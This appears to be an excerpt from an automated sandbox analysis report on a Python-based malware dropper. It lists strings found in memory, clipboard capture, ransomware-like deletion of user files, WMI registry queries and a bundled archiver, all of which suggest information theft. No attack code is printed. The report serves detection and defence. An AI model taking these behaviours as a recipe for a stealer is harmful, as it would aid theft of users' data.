String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1379613683.0000016197193000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1376271059.00000161970EA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1373841693.000001619712E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1377195618.00000161970EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefox
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1461416760.00000161970A9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1459998422.00000161970A8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1437068870.000001619707C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1408881507.0000016197083000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1457822695.0000016197083000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1424909795.000001619707F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1373841693.00000161970D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozir
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1424909795.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1459659839.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1760965599.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1762531034.00000161970DF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1437068870.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1759071926.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765429469.00000161970E2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1408881507.00000161970CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.moziv
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1764753885.0000016196C10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1759071926.000001619707C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1437068870.000001619707C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1408881507.0000016197083000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1373771178.000001619707C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1457822695.0000016197083000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1424909795.000001619707F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1764538565.0000016196A05000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765287498.0000016197083000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1372221043.00000161970B5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767449451.0000016197D70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767449451.0000016197D70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197F34000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EE4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EE4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EE4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.ca/
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EE4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EE4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EE4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EE4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767449451.0000016197D70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EE4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EE4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1764753885.0000016196C55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EE4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1764753885.0000016196C55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EE4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EE4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EE4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1387908629.0000016197106000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197F34000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1408881507.0000016197083000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EA0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767089682.00000161975E8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1416485014.00000161975E8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1758780938.00000161975E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1423277349.00000161975D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1379613683.0000016197193000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1373841693.00000161970D7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1424909795.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1373841693.000001619712E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1459659839.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1437068870.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1373771178.000001619707C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1383035256.00000161970DE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1408881507.00000161970CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1408881507.0000016197083000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1379613683.0000016197193000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1373841693.00000161970D7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1424909795.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1376271059.00000161970EA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1373841693.000001619712E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1459659839.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1385557647.00000161970B5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1383035256.00000161970EA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1760965599.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1762531034.00000161970DF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1437068870.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1759071926.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1384787134.00000161970ED000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1383035256.00000161970DE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765429469.00000161970E2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1408881507.00000161970CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1408881507.0000016197083000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1373841693.00000161970D7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1383035256.00000161970DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firef166~1.0_0SO
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1424909795.00000161970CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firef387011~2.SQL
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1408881507.00000161970CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefTRING~1.JSO
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1459659839.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1437068870.00000161970CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefUNINDE~1STO
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1379613683.0000016197193000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1373841693.000001619712E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1424909795.000001619710E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1389040023.000001619721D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1388624376.000001619710F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1429058459.0000016197111000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1396544422.0000016197112000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1408456923.000001619721D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1376271059.00000161970EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=b
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1379613683.0000016197193000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1373841693.000001619712E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1408881507.0000016197083000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1373771178.000001619707C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1379810609.0000016197110000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1424909795.000001619707F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1408881507.0000016197083000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1408881507.0000016197083000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767792449.0000016198484000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197F34000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EE4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1327152682.00000162E1226000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1770691400.00007FF8E6E27000.00000004.00000001.01000000.0000000F.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772036219.00007FF8E7353000.00000004.00000001.01000000.00000010.sdmp, libssl-1_1.dll.0.dr, libcrypto-1_1.dll.0.dr String found in binary or memory: https://www.openssl.org/H
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1764313337.00000161965B0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.dr String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1774041313.00007FF8E79F8000.00000040.00000001.01000000.00000004.sdmp String found in binary or memory: https://www.python.org/psf/license/
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EE4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767449451.0000016197D70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197F34000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1759071926.00000161970A9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1372221043.00000161970B5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1385557647.00000161970B5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1437068870.000001619707C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1408881507.0000016197083000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765347451.00000161970AE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1762649587.00000161970AC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1457822695.0000016197083000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1766262615.000001619731F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1424909795.000001619707F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1379967159.0000016197320000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1459659839.00000161970B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://yahoo.com/
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands
barindex
Modifies existing user documents (likely ransomware behavior)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File deleted: C:\Users\user\AppData\Local\Temp\? ? \Common Files\Desktop\ZBEDCJPBEY.mp3 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File deleted: C:\Users\user\AppData\Local\Temp\? ? \Common Files\Desktop\HTAGVDFUIE.jpg Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File deleted: C:\Users\user\AppData\Local\Temp\? ? \Common Files\Desktop\HTAGVDFUIE.jpg Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File deleted: C:\Users\user\AppData\Local\Temp\? ? \Common Files\Desktop\NHPKIZUUSG.jpg Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File deleted: C:\Users\user\AppData\Local\Temp\? ? \Common Files\Desktop\FACWLRWHGG.docx Jump to behavior
Too many similar processes found
Source: cmd.exe Process created: 54

System Summary
barindex
Very long command line found
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 3615
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: Commandline size = 3647 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 3615
Writes or reads registry keys via WMI
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2D3A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle, 72_2_00007FF71D2D3A70
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2FB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx, 72_2_00007FF71D2FB57C
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B1116950 0_2_00007FF7B1116950
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B10F7950 0_2_00007FF7B10F7950
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B110842C 0_2_00007FF7B110842C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B10F9B8B 0_2_00007FF7B10F9B8B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B111789C 0_2_00007FF7B111789C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B1108278 0_2_00007FF7B1108278
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B1102270 0_2_00007FF7B1102270
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B110EA90 0_2_00007FF7B110EA90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B110AA10 0_2_00007FF7B110AA10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B1102474 0_2_00007FF7B1102474
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B11124C4 0_2_00007FF7B11124C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B1103CC0 0_2_00007FF7B1103CC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B1108CB0 0_2_00007FF7B1108CB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B1114CFC 0_2_00007FF7B1114CFC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B1106510 0_2_00007FF7B1106510
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B1103330 0_2_00007FF7B1103330
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B1117350 0_2_00007FF7B1117350
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B1116BCC 0_2_00007FF7B1116BCC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B1101E60 0_2_00007FF7B1101E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B1102680 0_2_00007FF7B1102680
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B10F9D2B 0_2_00007FF7B10F9D2B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B1111518 0_2_00007FF7B1111518
